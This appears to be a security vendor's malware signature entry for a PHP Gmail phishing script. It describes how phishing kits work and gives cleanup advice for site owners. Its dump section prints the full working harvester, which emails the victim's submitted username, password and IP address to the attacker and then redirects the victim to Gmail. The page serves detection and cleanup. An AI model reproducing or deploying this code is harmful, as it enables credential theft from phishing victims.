Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.phishing.gmail.001

php.phishing.gmail.001

Phishing is a way to illegally acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication (web site, email, etc). Those fake websites are hosted on compromised sites without the owner's permission and are sent to the victims using mailing scripts, hosted or not in the same server where the phishing page is.
Phishing pages are often complex and rely on several files to run. They will be hosted on a specific directory ressembling the phishing target.
PHP phishing tools are malware accomplices which are mostly used to send the captured credentials and perform the last actions, like redirecting to the correct page or even closing the browser window.
This tool sends the user's stolen credentials to the author's e-mail then redirects the user to the correct GMail page

Affecting

Any website running vulnerable software or hosted on a server with compromised access credentials

Cleanup

Inspect your site's files and directories for strange names or names that ressemble other sites than yours and delete them.
Reviewing your site's access logs to find unusual POST requests is a good way to find if your site is infected and where the malicious code is being hosted

Dump


<?

$ip = getenv("REMOTE_ADDR");
$message .= "--------------Created By Raad------------------------------n";
$message .= "Username: ".$_POST['Username']."n";
$message .= "Password: ".$_POST['Passwd']."n";
$message .= "IP: ".$ip."n";
$message .= "---------------Created By Raad------------------------------n";

$recipient = "email @ address";
$subject = "Sheedo$";
$headers = "From: Blog";
$headers .= $_POST['email @ address ']."n";
$headers .= "MIME-Version: 1.0n";
if (mail($recipient,$subject,$message,$headers))
{
header("Location: https://gmail.com");

}
else
{
echo "ERROR! Please go back and try again.";
}

?>